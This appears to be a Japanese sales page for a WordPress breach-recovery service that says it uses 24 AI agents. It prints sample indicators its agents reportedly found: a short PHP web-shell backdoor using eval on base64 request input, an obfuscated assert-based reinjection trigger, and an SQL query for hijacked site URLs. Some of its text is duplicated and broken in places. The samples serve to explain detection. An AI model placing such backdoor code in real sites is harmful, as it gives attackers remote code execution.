uploads配下に仕込まれた
本サンプルは演習環境で実検出されたもの。アクセスログを精査しないと、設置と実行が一致せず見落とされる。
<?php
/* lk9d8f.php — 一見、単なる空ファイル。
実態は、攻撃者が任意のPHPコードを実行できるバックドア。 */
if (isset($_REQUEST["c"])) {
@eval(base64_decode($_REQUEST["c"]));
}
//↑ この3行で、サイト全体が攻撃者のものになる。「サイトが改ざんされた」「Google から『このサイトは危険です』と警告が出た」「管理画面に入れない」「が仕込まれた」—— そんな WordPress の緊急事態に、が並列で駆けつけ、調査から再発防止まで一気通貫で対応します。
いきなりのご契約ではなく、まずはサイト URL を1行いただくだけの無料診断から。状況を整理した上で、必要な対応をご提案します。
URL を1行入力するだけ · 速やかに折り返し · 後払い対応 · パニック中でも大丈夫です
※ 上記は実対応案件の処理ログ再現(個別情報は匿名化)
※ 「2:20:00」は特定事例の参考値です。所要時間はサイト規模・侵害深度・サーバ環境により大きく変動します。すべての WordPress サイトで同じ時間を保証するものではありません。
Photo: Mohammad Rahmani / Unsplash
他社で復旧が終わったあと、WP-AIレスキューにセカンドオピニオンを依頼すると、 こういう の見落とし が見つかることがあります。 WordPress の侵害現場で AI エージェントが実際に検出した、3つの典型サンプルです。

本サンプルは演習環境で実検出されたもの。アクセスログを精査しないと、設置と実行が一致せず見落とされる。
<?php
/* lk9d8f.php — 一見、単なる空ファイル。
実態は、攻撃者が任意のPHPコードを実行できるバックドア。 */
if (isset($_REQUEST["c"])) {
@eval(base64_decode($_REQUEST["c"]));
}
//↑ この3行で、サイト全体が攻撃者のものになる。「ファイル名は変えられない、中身だけ汚染」型。テーマ更新で消すと管理画面ごと壊れるため、行範囲特定が必須。
// — 末尾に静かに追記される、難読化された再注入トリガー —
$_HK = "Z3ppbmZsYXRl"; // = "gzinflate"
@${$_HK = base64_decode($_HK)}; // 動的関数解決
if (isset($_GET["x"]) && $_GET["x"] === "ping") {
@assert($_POST["p"] ?? "true"); // 任意コード実行
}ファイル系のスキャンだけでは絶対に見つからない。DBクエリでの直接照合が必要。
-- DB上の設定値が、ある日こうなっている。
SELECT option_name, option_value
FROM wp_options
WHERE option_name IN ('siteurl', 'home');
-- option_value がこっそり外部ドメインに書き換わると、
-- ログイン画面まで攻撃者制御サーバへリダイレクトされる。WordPress への侵害は、「気付かれにくい場所」に潜みます。
人手で1ファイルずつ目視している限り、見落としは生まれやすくなります。 24体の AI エージェントが 同時並列で 全ファイル・全 DB レコード・全アクセスログを照合し、 「この1行だけ怪しい」を徹底的に拾い上げる——これが WP-AIレスキューのアプローチです。
すでに WordPress が侵害された疑いがある方は 「症状から確かめる」 から、 業者選定の比較検討中の方は 「復旧の中身を知る」・「実例を読む」 から、 それぞれ目的に合わせてお進みください。
改ざん・乗っ取り・マルウェア混入・管理画面ログイン不可など、WordPress 侵害でよくある12の症状を1分で確認。当てはまれば、サイト URL を1行入れるだけで無料診断へ進めます。
24体の WordPress 専門 AI エージェント体制と、WordPress エコシステム準拠の7フェーズ。改ざん検出・封じ込め・ハードニングが、どんな順で進むのかを公開しています。
侵害発覚から完全復旧まで2時間20分(事例)の WordPress フィールドレポート。侵入経路の特定から証拠保全まで、4章のドキュメンタリーで追跡します。
WordPress 緊急復旧・フォレンジック調査・月次運用の3プラン。一般的な復旧業者との対応範囲の違いと、二次被害コストの参考レンジを比較表で掲載しています。
WordPress 制作会社・サーバ会社の方向けのパートナー制度。紹介フィー20%キャッシュバック・共同対応・競合提案なしで、緊急復旧だけ引き受けます。
他社で WordPress 復旧済みでも依頼できますか/支払いタイミング/個人情報漏洩の通知義務/復旧失敗時の保証——12のよくあるご質問に正直にお答えしています。
サイト URL を1行いただくだけで、まずは現状を見立てます。
緊急復旧・お見積もりのご依頼も、症状の詳細をお送りいただければ、原則24時間以内の着手を目標に動き始めます。深夜・土日もお気軽に。
URL を1行入力するだけ · 速やかに折り返し · 後払い対応